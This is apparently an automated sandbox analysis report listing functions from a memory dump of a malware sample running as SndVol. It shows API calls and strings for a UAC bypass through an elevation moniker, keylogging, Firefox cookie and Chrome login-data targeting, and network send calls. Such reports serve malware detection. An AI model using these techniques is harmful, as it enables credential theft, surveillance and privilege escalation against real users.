Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Function 00419627 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 206COMMON

Download Yara Rule

Strings

0, xrefs: 00419651
6, xrefs: 00419813
2, xrefs: 004196F4
1, xrefs: 00419695
3, xrefs: 00419754
4, xrefs: 004197B8
7, xrefs: 0041982A
5, xrefs: 00419809

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

Elevation:Administrator!new:, xrefs: 00407542
[-] CoGetObject FAILURE, xrefs: 0040758E
[+] ucmAllocateElevatedObject, xrefs: 00407508
[+] CoGetObject SUCCESS, xrefs: 00407595
$, xrefs: 0040753B
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[+] CoGetObject, xrefs: 00407561

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Function 0536B415 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0536B42B
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0536B47A
GetLastError.KERNEL32 ref: 0536B488
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0536B4C0

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
Instruction ID: ab30d53e5e4b2891333cdce119a5be8329bc19170958ce92690f793875406432
Opcode Fuzzy Hash: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
Instruction Fuzzy Hash: 3C814071208305AFC714EF20DC98EAFB7A8BF94764F50592DF98253150EE74EA45CB62

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C
lJD, xrefs: 004526F2, 004526E7, 00452745
lJD, xrefs: 00452626, 004527C5

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0040C36E
\cookies.sqlite, xrefs: 0040C409
AppData, xrefs: 0040C358

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 4df2a84653b9998b7d2611416e9b7e0e9783126b4176f23e9f3b784d6a9020ad
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 4df2a84653b9998b7d2611416e9b7e0e9783126b4176f23e9f3b784d6a9020ad
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Function 0536A7C2 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0536AA18

Part of subcall function 0536D152: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,05354DFC,00465E74), ref: 0536D16B

Strings

PG, xrefs: 0536A8A2
PXG, xrefs: 0536AAFB
PXG, xrefs: 0536A995
(eF, xrefs: 0536AA3A
8SG, xrefs: 0536A8B8
NG, xrefs: 0536A7F2

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CreateFindFirst
String ID: (eF$8SG$PXG$PXG$NG$PG
API String ID: 41799849-875132146
Opcode ID: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
Instruction ID: 382a4db048d258999e6790d33ddd35f64c05b75124e50935d8ad9b61b3fcbecc
Opcode Fuzzy Hash: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
Instruction Fuzzy Hash: 818182757042409BD718FB30DC58EEF73A9AFA0260F50992DFC96571E4EF309A49C652

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32(?), ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Function 0535C7FD Relevance: 12.1, APIs: 8, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00466A84), ref: 0535C87C
FindClose.KERNEL32(00000000), ref: 0535C896
FindNextFileA.KERNEL32(00000000,?), ref: 0535C9B9
FindClose.KERNEL32(00000000), ref: 0535C9DF

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
Instruction ID: a68530f6c06bab7312fc95f7486cc559b13b8016e88a2b76cafb70aeeb9ce43b
Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
Instruction Fuzzy Hash: 32518131A0421DABDB14F7B0DC5DEEE7778BF11264F10216AFC0666091FF706A49CA55

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32(00000000), ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
GetProcAddress.KERNEL32(00000000), ref: 00414271

Strings

SHDeleteKeyW, xrefs: 00414260
Shlwapi.dll, xrefs: 00414265

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 4793322b27984231f79bc6c38662749e635957783f1b56b8fa652e3949e54a9b
Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
Opcode Fuzzy Hash: 4793322b27984231f79bc6c38662749e635957783f1b56b8fa652e3949e54a9b
Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Function 053594D9 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 053594DE
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 05359597
__CxxThrowException@8.LIBVCRUNTIME ref: 053595BF
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 053595CC
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 053596E2

Strings

hdF, xrefs: 05359501

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID: hdF
API String ID: 1771804793-665520524
Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction ID: 51adf9f6ed7051d35314a67fa0d2f2f3cc998ba89b49380f7f3146edc921d2a6
Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
Instruction Fuzzy Hash: EB515377A00109AACF04FFA4DD59EEE7779BF10220F516569BC06A7090EF349B49CB91

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

SetSuspendState, xrefs: 00416861
PowrProf.dll, xrefs: 00416866
!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

OCP, xrefs: 00452490
ACP, xrefs: 0045245A
['E, xrefs: 004524F3, 004524CA

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
GetLastError.KERNEL32 ref: 0040BA58

Strings

UserProfile, xrefs: 0040BA1E
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
[Chrome StoredLogins not found], xrefs: 0040BA72
[Chrome StoredLogins found, cleared!], xrefs: 0040BA7E

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,034A5460,00000010), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

